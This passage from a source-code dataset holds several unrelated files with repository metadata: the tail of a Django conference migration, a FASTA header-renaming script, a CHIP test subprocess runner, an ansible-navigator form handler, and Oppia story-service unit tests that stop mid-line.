Pacific/Efate'), (b'Pacific/Guadalcanal', b'(GMT+1100) Pacific/Guadalcanal'), (b'Pacific/Kosrae', b'(GMT+1100) Pacific/Kosrae'), (b'Pacific/Noumea', b'(GMT+1100) Pacific/Noumea'), (b'Pacific/Pohnpei', b'(GMT+1100) Pacific/Pohnpei'), (b'Pacific/Norfolk', b'(GMT+1130) Pacific/Norfolk'), (b'Antarctica/McMurdo', b'(GMT+1200) Antarctica/McMurdo'), (b'Asia/Anadyr', b'(GMT+1200) Asia/Anadyr'), (b'Asia/Kamchatka', b'(GMT+1200) Asia/Kamchatka'), (b'Pacific/Auckland', b'(GMT+1200) Pacific/Auckland'), (b'Pacific/Fiji', b'(GMT+1200) Pacific/Fiji'), (b'Pacific/Funafuti', b'(GMT+1200) Pacific/Funafuti'), (b'Pacific/Kwajalein', b'(GMT+1200) Pacific/Kwajalein'), (b'Pacific/Majuro', b'(GMT+1200) Pacific/Majuro'), (b'Pacific/Nauru', b'(GMT+1200) Pacific/Nauru'), (b'Pacific/Tarawa', b'(GMT+1200) Pacific/Tarawa'), (b'Pacific/Wake', b'(GMT+1200) Pacific/Wake'), (b'Pacific/Wallis', b'(GMT+1200) Pacific/Wallis'), (b'Pacific/Chatham', b'(GMT+1245) Pacific/Chatham'), (b'Pacific/Apia', b'(GMT+1300) Pacific/Apia'), (b'Pacific/Enderbury', b'(GMT+1300) Pacific/Enderbury'), (b'Pacific/Fakaofo', b'(GMT+1300) Pacific/Fakaofo'), (b'Pacific/Tongatapu', b'(GMT+1300) Pacific/Tongatapu'), (b'Pacific/Kiritimati', b'(GMT+1400) Pacific/Kiritimati')])), ], options={ 'verbose_name': 'conference', 'verbose_name_plural': 'conferences', }, bases=(models.Model,), ), migrations.CreateModel( name='Section', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(max_length=100, verbose_name='name')), ('slug', models.SlugField()), ('start_date', models.DateField(null=True, verbose_name='start date', blank=True)), ('end_date', models.DateField(null=True, verbose_name='end date', blank=True)), ('conference', models.ForeignKey(verbose_name='conference', to='conference.Conference')), ], options={ 'verbose_name': 'section', 'verbose_name_plural': 'sections', }, bases=(models.Model,), ), ]
544.630435
23,334
0.690496
f5a6a6cbdde36e6007dbda681e3e49bd6a8a889b
1,350
py
Python
src/pdc2/scripts/fix_names_from_transdecoder.py
jlanga/smsk_selection
08070c6d4a6fbd9320265e1e698c95ba80f81123
[ "MIT" ]
4
2021-07-18T05:20:20.000Z
2022-01-03T10:22:33.000Z
src/pdc2/scripts/fix_names_from_transdecoder.py
jlanga/smsk_selection
08070c6d4a6fbd9320265e1e698c95ba80f81123
[ "MIT" ]
1
2017-08-21T07:26:13.000Z
2018-11-08T13:59:48.000Z
src/pdc2/scripts/fix_names_from_transdecoder.py
jlanga/smsk_orthofinder
08070c6d4a6fbd9320265e1e698c95ba80f81123
[ "MIT" ]
2
2021-07-18T05:20:26.000Z
2022-03-31T18:23:31.000Z
""" fix EST names to taxonID@seqID before transdecoder """ import os,sys #seq names look like #>TR10000|c0_g1_i1|m.14496 TR10000|c0_g1_i1|g.14496 ORF TR10000|c0_g1_i1|g.14496 TR10000|c0_g1_i1|m.14496 type:5prime_partial len:180 (+) TR10000|c0_g1_i1:1-540(+) #>cds.Mecr@gi_11549800_gb_BF478973_1_BF478973|m.9518 Mecr@gi_11549800_gb_BF478973_1_BF478973|g.9518 ORF Mecr@gi_11549800_gb_BF478973_1_BF478973|g.9518 Mecr@gi_11549800_gb_BF478973_1_BF478973|m.9518 type:3prime_partial len:195 (+) Mecr@gi_11549800_gb_BF478973_1_BF478973:86-667(+) if __name__ =="__main__": if len(sys.argv) != 3: print "usage: python fix_names_from_transdecoder.py inDIR outDIR" sys.exit() inDIR = sys.argv[1]+"/" outDIR = sys.argv[2]+"/" for i in os.listdir(inDIR): taxonID = i.split(".")[0] if i.endswith("transdecoder.pep"): outname = taxonID+".pep.fa" elif i.endswith("transdecoder.cds"): outname = taxonID+".cds.fa" elif i.endswith(".Trinity.fasta"): os.system("gzip "+inDIR+i) continue else: continue print i infile = open(inDIR+i,"rU") outfile = open(outDIR+outname,"w") for line in infile: if line[0] == ">": newid = line.split(" ")[0] newid = newid.split(".")[-1] outfile.write(">"+taxonID+"@"+newid+"\n") else: outfile.write(line) outfile.close infile.close() os.system("gzip "+inDIR+i)
31.395349
280
0.698519
aa17a09f4ea5c62aec96daa8d42affacf32687da
3,460
py
Python
scripts/tests/chiptest/runner.py
ChengqiangShe/connectedhomeip
3a617aa821e7c84093ab17313d6ce02d3ec32219
[ "Apache-2.0" ]
3
2022-02-09T08:42:16.000Z
2022-02-22T04:47:02.000Z
scripts/tests/chiptest/runner.py
ChengqiangShe/connectedhomeip
3a617aa821e7c84093ab17313d6ce02d3ec32219
[ "Apache-2.0" ]
8
2020-07-07T21:51:44.000Z
2021-07-26T13:43:00.000Z
scripts/tests/chiptest/runner.py
doublemis1/connectedhomeip
6a08b0404b7b068fd080db504d3eb1edf4bef89f
[ "Apache-2.0" ]
7
2021-04-26T06:22:35.000Z
2021-12-16T07:10:43.000Z
# Copyright (c) 2021 Project CHIP Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging import os import subprocess import sys import threading import time import pty import re from dataclasses import dataclass class LogPipe(threading.Thread): def __init__(self, level, capture_delegate=None, name=None): """Setup the object with a logger and a loglevel and start the thread """ threading.Thread.__init__(self) self.daemon = False self.level = level if sys.platform == 'darwin': self.fd_read, self.fd_write = pty.openpty() else: self.fd_read, self.fd_write = os.pipe() self.pipeReader = os.fdopen(self.fd_read) self.captured_logs = [] self.capture_delegate = capture_delegate self.name = name self.start() def CapturedLogContains(self, txt: str): return any(txt in l for l in self.captured_logs) def FindLastMatchingLine(self, matcher): for l in reversed(self.captured_logs): match = re.match(matcher, l) if match: return match return None def fileno(self): """Return the write file descriptor of the pipe""" return self.fd_write def run(self): """Run the thread, logging everything.""" for line in iter(self.pipeReader.readline, ''): logging.log(self.level, line.strip('\n')) self.captured_logs.append(line) if self.capture_delegate: self.capture_delegate.Log(self.name, line) self.pipeReader.close() def close(self): """Close the write end of the pipe.""" os.close(self.fd_write) class Runner: def __init__(self, capture_delegate=None): self.capture_delegate = capture_delegate def RunSubprocess(self, cmd, name, wait=True, dependencies=[]): outpipe = LogPipe( logging.DEBUG, capture_delegate=self.capture_delegate, name=name + ' OUT') errpipe = LogPipe( logging.INFO, capture_delegate=self.capture_delegate, name=name + ' ERR') if self.capture_delegate: self.capture_delegate.Log(name, 'EXECUTING %r' % cmd) s = subprocess.Popen(cmd, stdout=outpipe, stderr=errpipe) outpipe.close() errpipe.close() if not wait: return s, outpipe, errpipe while s.poll() is None: # dependencies MUST NOT be done for dependency in dependencies: if dependency.poll() is not None: s.kill() raise Exception("Unexpected return %d for %r", dependency.poll(), dependency) code = s.wait() if code != 0: raise Exception('Command %r failed: %d' % (cmd, code)) else: logging.debug('Command %r completed with error code 0', cmd)
30.892857
86
0.621387
88a666529948068372d471e9d68f76dc1cce6597
847
py
Python
src/ansible_navigator/ui_framework/form_handler_working.py
goneri/ansible-navigator
59c5c4e9758404bcf363face09cf46c325b01ad3
[ "Apache-2.0" ]
null
null
null
src/ansible_navigator/ui_framework/form_handler_working.py
goneri/ansible-navigator
59c5c4e9758404bcf363face09cf46c325b01ad3
[ "Apache-2.0" ]
null
null
null
src/ansible_navigator/ui_framework/form_handler_working.py
goneri/ansible-navigator
59c5c4e9758404bcf363face09cf46c325b01ad3
[ "Apache-2.0" ]
null
null
null
"""working handler, instant 1112065 utf-8 max = 112064 """ from typing import TYPE_CHECKING from typing import List from typing import Tuple from .curses_window import CursesWindow if TYPE_CHECKING: from .field_working import FieldWorking # pylint: disable=cyclic-import class FormHandlerWorking(CursesWindow): """handle form button""" def __init__(self, screen, ui_config): """Initialize the handler for a form working notification. :param screen: A curses window :param ui_config: The current user interface configuration """ super().__init__(ui_config=ui_config) self._screen = screen @staticmethod def handle(idx, form_fields: List) -> Tuple["FieldWorking", int]: """handle the information field, immediate return""" return form_fields[idx], 112065
26.46875
76
0.70366
0e1ace7891c411af6dfb381018dd4408151a9848
91,192
py
Python
core/domain/story_services_test.py
WebFlakyTest/oppia
520e35490eae8171beb035fbafc2948983abec75
[ "Apache-2.0" ]
1
2021-08-17T20:33:12.000Z
2021-08-17T20:33:12.000Z
core/domain/story_services_test.py
WebFlakyTest/oppia
520e35490eae8171beb035fbafc2948983abec75
[ "Apache-2.0" ]
null
null
null
core/domain/story_services_test.py
WebFlakyTest/oppia
520e35490eae8171beb035fbafc2948983abec75
[ "Apache-2.0" ]
null
null
null
# Copyright 2018 The Oppia Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests the methods defined in story services.""" from __future__ import absolute_import # pylint: disable=import-only-modules from __future__ import unicode_literals # pylint: disable=import-only-modules import logging import os from constants import constants from core.domain import exp_domain from core.domain import exp_services from core.domain import fs_domain from core.domain import param_domain from core.domain import story_domain from core.domain import story_fetchers from core.domain import story_services from core.domain import topic_fetchers from core.domain import topic_services from core.domain import user_services from core.platform import models from core.tests import test_utils import feconf import python_utils import utils (story_models, user_models) = models.Registry.import_models( [models.NAMES.story, models.NAMES.user]) class StoryServicesUnitTests(test_utils.GenericTestBase): """Test the story services module.""" STORY_ID = None EXP_ID = 'exp_id' NODE_ID_1 = story_domain.NODE_ID_PREFIX + '1' NODE_ID_2 = 'node_2' USER_ID = 'user' story = None def setUp(self): super(StoryServicesUnitTests, self).setUp() self.signup('a@example.com', 'A') self.signup('b@example.com', 'B') self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME) self.user_id_a = self.get_user_id_from_email('a@example.com') self.user_id_b = self.get_user_id_from_email('b@example.com') self.user_id_admin = self.get_user_id_from_email(self.ADMIN_EMAIL) self.STORY_ID = story_services.get_new_story_id() self.TOPIC_ID = topic_fetchers.get_new_topic_id() self.save_new_topic( self.TOPIC_ID, self.USER_ID, name='Topic', abbreviated_name='topic-one', url_fragment='topic-one', description='A new topic', canonical_story_ids=[], additional_story_ids=[], uncategorized_skill_ids=['skill_4'], subtopics=[], next_subtopic_id=0) self.save_new_story(self.STORY_ID, self.USER_ID, self.TOPIC_ID) topic_services.add_canonical_story( self.USER_ID, self.TOPIC_ID, self.STORY_ID) self.save_new_valid_exploration( self.EXP_ID, self.user_id_admin, end_state_name='End', correctness_feedback_enabled=True) self.publish_exploration(self.user_id_admin, self.EXP_ID) changelist = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': self.NODE_ID_1, 'title': 'Title 1' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID), 'node_id': self.NODE_ID_1, 'old_value': None, 'new_value': self.EXP_ID }) ] story_services.update_story( self.USER_ID, self.STORY_ID, changelist, 'Added node.') self.story = story_fetchers.get_story_by_id(self.STORY_ID) self.set_admins([self.ADMIN_USERNAME]) self.set_topic_managers([user_services.get_username(self.user_id_a)]) self.user_a = user_services.get_user_actions_info(self.user_id_a) self.user_b = user_services.get_user_actions_info(self.user_id_b) self.user_admin = user_services.get_user_actions_info( self.user_id_admin) def test_compute_summary(self): story_summary = story_services.compute_summary_of_story(self.story) self.assertEqual(story_summary.id, self.STORY_ID) self.assertEqual(story_summary.title, 'Title') self.assertEqual(story_summary.description, 'Description') self.assertEqual(story_summary.node_titles, ['Title 1']) self.assertEqual(story_summary.thumbnail_bg_color, None) self.assertEqual(story_summary.thumbnail_filename, None) def test_get_new_story_id(self): new_story_id = story_services.get_new_story_id() self.assertEqual(len(new_story_id), 12) self.assertEqual(story_models.StoryModel.get_by_id(new_story_id), None) def test_commit_log_entry(self): story_commit_log_entry = ( story_models.StoryCommitLogEntryModel.get_commit(self.STORY_ID, 1) ) self.assertEqual(story_commit_log_entry.commit_type, 'create') self.assertEqual(story_commit_log_entry.story_id, self.STORY_ID) self.assertEqual(story_commit_log_entry.user_id, self.USER_ID) def test_update_story_properties(self): changelist = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY, 'property_name': story_domain.STORY_PROPERTY_TITLE, 'old_value': 'Title', 'new_value': 'New Title' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY, 'property_name': story_domain.STORY_PROPERTY_DESCRIPTION, 'old_value': 'Description', 'new_value': 'New Description' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY, 'property_name': story_domain.STORY_PROPERTY_THUMBNAIL_FILENAME, 'old_value': None, 'new_value': 'image.svg' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY, 'property_name': ( story_domain.STORY_PROPERTY_THUMBNAIL_BG_COLOR), 'old_value': None, 'new_value': constants.ALLOWED_THUMBNAIL_BG_COLORS['story'][0] }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY, 'property_name': ( story_domain.STORY_PROPERTY_META_TAG_CONTENT), 'old_value': None, 'new_value': 'new story meta tag content' }) ] # Save a dummy image on filesystem, to be used as thumbnail. with python_utils.open_file( os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'), 'rb', encoding=None) as f: raw_image = f.read() fs = fs_domain.AbstractFileSystem( fs_domain.GcsFileSystem( feconf.ENTITY_TYPE_STORY, self.STORY_ID)) fs.commit( '%s/image.svg' % (constants.ASSET_TYPE_THUMBNAIL), raw_image, mimetype='image/svg+xml') story_services.update_story( self.USER_ID, self.STORY_ID, changelist, 'Updated Title and Description.') story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual(story.title, 'New Title') self.assertEqual(story.description, 'New Description') self.assertEqual(story.thumbnail_filename, 'image.svg') self.assertEqual(story.thumbnail_size_in_bytes, len(raw_image)) self.assertEqual( story.thumbnail_bg_color, constants.ALLOWED_THUMBNAIL_BG_COLORS['story'][0]) self.assertEqual(story.version, 3) self.assertEqual(story.meta_tag_content, 'new story meta tag content') story_summary = story_fetchers.get_story_summary_by_id(self.STORY_ID) self.assertEqual(story_summary.title, 'New Title') self.assertEqual(story_summary.node_titles, ['Title 1']) self.assertEqual( story_summary.thumbnail_bg_color, constants.ALLOWED_THUMBNAIL_BG_COLORS['story'][0]) self.assertEqual(story_summary.thumbnail_filename, 'image.svg') def test_update_story_node_properties(self): changelist = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': self.NODE_ID_2, 'title': 'Title 2' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_DESCRIPTION), 'node_id': self.NODE_ID_2, 'old_value': '', 'new_value': 'Description 2' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS), 'node_id': self.NODE_ID_2, 'old_value': [], 'new_value': [self.NODE_ID_1] }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS, 'node_id': self.NODE_ID_2, 'old_value': False, 'new_value': True }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_CONTENTS_PROPERTY, 'property_name': ( story_domain.INITIAL_NODE_ID), 'old_value': self.NODE_ID_1, 'new_value': self.NODE_ID_2 }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'node_id': self.NODE_ID_2, 'property_name': ( story_domain.STORY_NODE_PROPERTY_THUMBNAIL_FILENAME), 'old_value': None, 'new_value': 'image.svg' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'node_id': self.NODE_ID_2, 'property_name': ( story_domain.STORY_NODE_PROPERTY_THUMBNAIL_BG_COLOR), 'old_value': None, 'new_value': constants.ALLOWED_THUMBNAIL_BG_COLORS[ 'chapter'][0] }) ] # Save a dummy image on filesystem, to be used as thumbnail. with python_utils.open_file( os.path.join(feconf.TESTS_DATA_DIR, 'test_svg.svg'), 'rb', encoding=None) as f: raw_image = f.read() fs = fs_domain.AbstractFileSystem( fs_domain.GcsFileSystem( feconf.ENTITY_TYPE_STORY, self.STORY_ID)) fs.commit( '%s/image.svg' % (constants.ASSET_TYPE_THUMBNAIL), raw_image, mimetype='image/svg+xml') story_services.update_story( self.USER_ID, self.STORY_ID, changelist, 'Added story node.') story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual( story.story_contents.nodes[1].thumbnail_filename, 'image.svg') self.assertEqual( story.story_contents.nodes[1].thumbnail_size_in_bytes, len(raw_image)) self.assertEqual( story.story_contents.nodes[1].thumbnail_bg_color, constants.ALLOWED_THUMBNAIL_BG_COLORS['chapter'][0]) self.assertEqual( story.story_contents.nodes[1].destination_node_ids, [self.NODE_ID_1]) self.assertEqual( story.story_contents.nodes[1].outline_is_finalized, True) self.assertEqual(story.story_contents.nodes[1].title, 'Title 2') self.assertEqual( story.story_contents.nodes[1].description, 'Description 2') self.assertEqual(story.story_contents.initial_node_id, self.NODE_ID_2) self.assertEqual(story.story_contents.next_node_id, 'node_3') self.assertEqual(story.version, 3) story_summary = story_fetchers.get_story_summary_by_id(self.STORY_ID) self.assertEqual(story_summary.node_titles, ['Title 1', 'Title 2']) changelist = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_DELETE_STORY_NODE, 'node_id': self.NODE_ID_1 }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS, 'node_id': self.NODE_ID_2, 'old_value': True, 'new_value': False }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_TITLE), 'node_id': self.NODE_ID_2, 'old_value': 'Title 2', 'new_value': 'Modified title 2' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_DESCRIPTION), 'node_id': self.NODE_ID_2, 'old_value': 'Description 2', 'new_value': 'Modified description 2' }), ] story_services.update_story( self.USER_ID, self.STORY_ID, changelist, 'Removed a story node.') story_summary = story_fetchers.get_story_summary_by_id(self.STORY_ID) story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual(story_summary.node_titles, ['Modified title 2']) self.assertEqual( story.story_contents.nodes[0].title, 'Modified title 2') self.assertEqual( story.story_contents.nodes[0].description, 'Modified description 2') self.assertEqual(story.story_contents.nodes[0].destination_node_ids, []) self.assertEqual( story.story_contents.nodes[0].outline_is_finalized, False) def test_prerequisite_skills_validation(self): self.story.story_contents.next_node_id = 'node_4' node_1 = { 'id': 'node_1', 'thumbnail_filename': 'image.svg', 'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[ 'chapter'][0], 'thumbnail_size_in_bytes': 21131, 'title': 'Title 1', 'description': 'Description 1', 'destination_node_ids': ['node_2', 'node_3'], 'acquired_skill_ids': ['skill_2'], 'prerequisite_skill_ids': ['skill_1'], 'outline': '', 'outline_is_finalized': False, 'exploration_id': None } node_2 = { 'id': 'node_2', 'thumbnail_filename': 'image.svg', 'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[ 'chapter'][0], 'thumbnail_size_in_bytes': 21131, 'title': 'Title 2', 'description': 'Description 2', 'destination_node_ids': [], 'acquired_skill_ids': ['skill_3'], 'prerequisite_skill_ids': ['skill_2'], 'outline': '', 'outline_is_finalized': False, 'exploration_id': None } node_3 = { 'id': 'node_3', 'thumbnail_filename': 'image.svg', 'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[ 'chapter'][0], 'thumbnail_size_in_bytes': 21131, 'title': 'Title 3', 'description': 'Description 3', 'destination_node_ids': [], 'acquired_skill_ids': [], 'prerequisite_skill_ids': ['skill_4'], 'outline': '', 'outline_is_finalized': False, 'exploration_id': None } self.story.story_contents.initial_node_id = 'node_1' self.story.story_contents.nodes = [ story_domain.StoryNode.from_dict(node_1), story_domain.StoryNode.from_dict(node_2), story_domain.StoryNode.from_dict(node_3) ] expected_error_string = ( 'The skills with ids skill_4 were specified as prerequisites for ' 'Chapter Title 3, but were not taught in any chapter before it') with self.assertRaisesRegexp( utils.ValidationError, expected_error_string): story_services.validate_prerequisite_skills_in_story_contents( self.story.corresponding_topic_id, self.story.story_contents) def test_story_with_loop(self): self.story.story_contents.next_node_id = 'node_4' node_1 = { 'id': 'node_1', 'thumbnail_filename': 'image.svg', 'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[ 'chapter'][0], 'thumbnail_size_in_bytes': 21131, 'title': 'Title 1', 'description': 'Description 1', 'destination_node_ids': ['node_2'], 'acquired_skill_ids': ['skill_2'], 'prerequisite_skill_ids': ['skill_1'], 'outline': '', 'outline_is_finalized': False, 'exploration_id': None } node_2 = { 'id': 'node_2', 'thumbnail_filename': 'image.svg', 'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[ 'chapter'][0], 'thumbnail_size_in_bytes': 21131, 'title': 'Title 2', 'description': 'Description 2', 'destination_node_ids': ['node_3'], 'acquired_skill_ids': ['skill_3'], 'prerequisite_skill_ids': ['skill_2'], 'outline': '', 'outline_is_finalized': False, 'exploration_id': None } node_3 = { 'id': 'node_3', 'thumbnail_filename': 'image.svg', 'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[ 'chapter'][0], 'thumbnail_size_in_bytes': 21131, 'title': 'Title 3', 'description': 'Description 3', 'destination_node_ids': ['node_2'], 'acquired_skill_ids': ['skill_4'], 'prerequisite_skill_ids': ['skill_3'], 'outline': '', 'outline_is_finalized': False, 'exploration_id': None } self.story.story_contents.nodes = [ story_domain.StoryNode.from_dict(node_1), story_domain.StoryNode.from_dict(node_2), story_domain.StoryNode.from_dict(node_3) ] expected_error_string = 'Loops are not allowed in stories.' with self.assertRaisesRegexp( utils.ValidationError, expected_error_string): story_services.validate_prerequisite_skills_in_story_contents( self.story.corresponding_topic_id, self.story.story_contents) def test_does_story_exist_with_url_fragment(self): story_id_1 = story_services.get_new_story_id() story_id_2 = story_services.get_new_story_id() self.save_new_story( story_id_1, self.USER_ID, self.TOPIC_ID, url_fragment='story-one') self.save_new_story( story_id_2, self.USER_ID, self.TOPIC_ID, url_fragment='story-two') topic_services.add_canonical_story( self.USER_ID, self.TOPIC_ID, story_id_1) topic_services.add_canonical_story( self.USER_ID, self.TOPIC_ID, story_id_2) self.assertTrue( story_services.does_story_exist_with_url_fragment('story-one')) self.assertTrue( story_services.does_story_exist_with_url_fragment('story-two')) self.assertFalse( story_services.does_story_exist_with_url_fragment('story-three')) def test_update_story_with_invalid_corresponding_topic_id_value(self): topic_id = topic_fetchers.get_new_topic_id() story_id = story_services.get_new_story_id() self.save_new_story(story_id, self.USER_ID, topic_id) changelist = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': self.NODE_ID_1, 'title': 'Title 1' }) ] with self.assertRaisesRegexp( Exception, ( 'Expected story to only belong to a valid topic, but ' 'found no topic with ID: %s' % topic_id)): story_services.update_story( self.USER_ID, story_id, changelist, 'Added node.') def test_update_story_which_not_corresponding_topic_id(self): topic_id = topic_fetchers.get_new_topic_id() story_id = story_services.get_new_story_id() self.save_new_topic( topic_id, self.USER_ID, name='A New Topic', abbreviated_name='new-topic', url_fragment='new-topic', description='A new topic description.', canonical_story_ids=[], additional_story_ids=[], uncategorized_skill_ids=[], subtopics=[], next_subtopic_id=0) self.save_new_story(story_id, self.USER_ID, topic_id) changelist = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': self.NODE_ID_1, 'title': 'Title 1' }) ] with self.assertRaisesRegexp( Exception, ( 'Expected story to belong to the topic %s, but it is ' 'neither a part of the canonical stories or the ' 'additional stories of the topic.' % topic_id)): story_services.update_story( self.USER_ID, story_id, changelist, 'Added node.') def test_delete_story(self): story_services.delete_story(self.USER_ID, self.STORY_ID) self.assertEqual(story_fetchers.get_story_by_id( self.STORY_ID, strict=False), None) self.assertEqual( story_fetchers.get_story_summary_by_id( self.STORY_ID, strict=False), None) def test_cannot_get_story_from_model_with_invalid_schema_version(self): story_model = story_models.StoryModel.get(self.STORY_ID) story_model.story_contents_schema_version = 0 story_model.commit(self.USER_ID, 'change schema version', []) with self.assertRaisesRegexp( Exception, 'Sorry, we can only process v1-v%d story schemas at ' 'present.' % feconf.CURRENT_STORY_CONTENTS_SCHEMA_VERSION): story_fetchers.get_story_from_model(story_model) def test_get_story_summaries_by_ids(self): story_summaries = story_fetchers.get_story_summaries_by_ids( [self.STORY_ID]) self.assertEqual(len(story_summaries), 1) self.assertEqual(story_summaries[0].id, self.STORY_ID) self.assertEqual(story_summaries[0].title, 'Title') self.assertEqual(story_summaries[0].description, 'Description') self.assertEqual(story_summaries[0].language_code, 'en') self.assertEqual(story_summaries[0].node_titles, ['Title 1']) self.assertEqual(story_summaries[0].thumbnail_filename, None) self.assertEqual(story_summaries[0].thumbnail_bg_color, None) self.assertEqual(story_summaries[0].version, 2) def test_cannot_update_story_with_non_story_change_changelist(self): observed_log_messages = [] def _mock_logging_function(msg, *args): """Mocks logging.error().""" observed_log_messages.append(msg % args) logging_swap = self.swap(logging, 'error', _mock_logging_function) assert_raises_regexp_context_manager = self.assertRaisesRegexp( Exception, 'Expected change to be of type StoryChange') with logging_swap, assert_raises_regexp_context_manager: story_services.update_story( self.USER_ID, self.STORY_ID, [{}], 'Updated story node.') self.assertEqual( observed_log_messages, [ 'Exception Expected change to be of type StoryChange %s [{}]' % self.STORY_ID ] ) def test_update_story_node_outline(self): story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual(story.story_contents.nodes[0].outline, '') change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_OUTLINE), 'node_id': 'node_1', 'old_value': '', 'new_value': 'new_outline' })] story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story outline.') story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual(story.story_contents.nodes[0].outline, 'new_outline') def test_cannot_update_story_node_outline_with_invalid_node_id(self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_OUTLINE), 'node_id': 'invalid_node', 'old_value': '', 'new_value': 'new_outline' })] with self.assertRaisesRegexp( Exception, 'The node with id invalid_node is not part of this story'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story outline.') def test_cannot_update_story_with_no_commit_message(self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_DESCRIPTION), 'node_id': self.NODE_ID_1, 'old_value': '', 'new_value': 'New description.' })] with self.assertRaisesRegexp( Exception, 'Expected a commit message but received none.'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, None) def test_update_story_acquired_skill_ids(self): story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual(story.story_contents.nodes[0].acquired_skill_ids, []) change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_ACQUIRED_SKILL_IDS), 'node_id': 'node_1', 'old_value': [], 'new_value': ['skill_id'] })] story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story acquired_skill_ids.') story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual( story.story_contents.nodes[0].acquired_skill_ids, ['skill_id']) def test_exploration_context_model_is_modified_correctly(self): changelist = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': self.NODE_ID_2, 'title': 'Title 2' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS), 'node_id': self.NODE_ID_1, 'old_value': [], 'new_value': [self.NODE_ID_2] }) ] story_services.update_story( self.USER_ID, self.STORY_ID, changelist, 'Added node.') self.save_new_valid_exploration( '0', self.user_id_admin, title='Title 1', category='Mathematics', language_code='en', correctness_feedback_enabled=True) self.save_new_valid_exploration( '1', self.user_id_admin, title='Title 2', category='Mathematics', language_code='en', correctness_feedback_enabled=True) self.save_new_valid_exploration( '2', self.user_id_admin, title='Title 3', category='Mathematics', language_code='en', correctness_feedback_enabled=True) self.publish_exploration(self.user_id_admin, '0') self.publish_exploration(self.user_id_admin, '1') self.publish_exploration(self.user_id_admin, '2') self.assertIsNone( 